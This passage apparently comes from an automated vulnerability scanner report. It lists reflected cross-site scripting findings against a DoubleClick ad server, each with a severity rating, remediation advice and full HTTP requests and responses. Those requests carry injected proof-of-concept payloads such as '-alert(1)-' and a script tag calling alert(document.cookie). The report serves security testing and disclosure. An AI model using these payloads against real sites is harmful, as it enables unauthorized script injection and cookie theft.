Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 17:45:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8043

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE73258'-alert(1)-'86e7173ff52&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26
...[SNIP]...

4.6. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bca7e"-alert(1)-"230eda09231 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAEbca7e"-alert(1)-"230eda09231&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 17:45:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8043

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAEbca7e"-alert(1)-"230eda09231&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26
...[SNIP]...

4.7. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1b4d"-alert(1)-"63ce073303c was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506a1b4d"-alert(1)-"63ce073303c&adurl=;ord=57634238? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 17:46:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8043

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506a1b4d"-alert(1)-"63ce073303c&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB%26csr%3Dneiotde_mm_intel-q12011%26ccy%3DDE%26cd%3D2011-01-06%26cn%3Dq
...[SNIP]...

4.8. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33f2c'-alert(1)-'a56d4b9fc45 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-512169042133750633f2c'-alert(1)-'a56d4b9fc45&adurl=;ord=57634238? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 17:46:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8043

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-512169042133750633f2c'-alert(1)-'a56d4b9fc45&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB%26csr%3Dneiotde_mm_intel-q12011%26ccy%3DDE%26cd%3D2011-01-06%26cn%3Dq
...[SNIP]...

4.9. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 457e7'-alert(1)-'caf99647365 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0457e7'-alert(1)-'caf99647365&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 17:45:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8043

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0457e7'-alert(1)-'caf99647365&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB
...[SNIP]...

4.10. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18bf3"-alert(1)-"7264eb482c2 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=018bf3"-alert(1)-"7264eb482c2&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 17:45:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8043

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=018bf3"-alert(1)-"7264eb482c2&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB
...[SNIP]...

4.11. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1262"-alert(1)-"37bb6a46aea was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpwd1262"-alert(1)-"37bb6a46aea&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 17:46:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8043

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
yJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpwd1262"-alert(1)-"37bb6a46aea&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB%26csr%3Dneiotde_mm_intel-q12011%26ccy%
...[SNIP]...

4.12. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3514'-alert(1)-'36e03f38f43 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpwe3514'-alert(1)-'36e03f38f43&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 17:46:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8043

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
yJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpwe3514'-alert(1)-'36e03f38f43&client=ca-pub-5121690421337506&adurl=http%3a%2f%2fwww.ibm.com/innovation/de/systemx/intel%3Fcmp%3D100K3%26ct%3D100K303A%26cr%3DMittelstandswiki_Rotation%26cm%3DB%26csr%3Dneiotde_mm_intel-q12011%26ccy%
...[SNIP]...

4.13. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43731"-alert(1)-"187433e4b2d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N1120.Mittelstandswiki/B5089496;sz=336x280;click=http://adclick.g.doubleclick.net/aclk?sa=l43731"-alert(1)-"187433e4b2d&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cuZGUvP2QxOGNiJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UwMmUwYTdlOTZiPTHgAQKpAm2G3Iu2yrY-wAIC4AIA6gIJNjUxNC9taXdp-AL40R6QA6QDmAOMBqgDAdAEkE7gBAE&num=0&sig=AGiWqty8E627muEmQx3YhDjMnFTKuJGFpw&client=ca-pub-5121690421337506&adurl=;ord=57634238? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 17:44:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8043

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 17 10:59:03 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
escape("http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3aa6/f/20d/%2a/b%3B234117088%3B0-0%3B0%3B57436492%3B4252-336/280%3B40303346/40321133/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=l43731"-alert(1)-"187433e4b2d&ai=B9MZ-29VOTYi_OZztlQfnzZ2uCtb3kP4BAAAAEAEgADgAWOag4YweYMmGo4fUo4AQggEXY2EtcHViLTUxMjE2OTA0MjEzMzc1MDayARd3d3cubWl0dGVsc3RhbmRzYmxvZy5kZboBCjMwMHgyNTBfYXPIAQnaAWZodHRwOi8vd3d3Lm1pdHRlbHN0YW5kc2Jsb2cu
...[SNIP]...

4.14. http://ad-emea.doubleclick.net/adj/N1120.Mittelstandswiki/B5089496 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/N1120.Mittelstandswiki/B5089496

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff622'-alert(1)-'d54c1daec2b was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

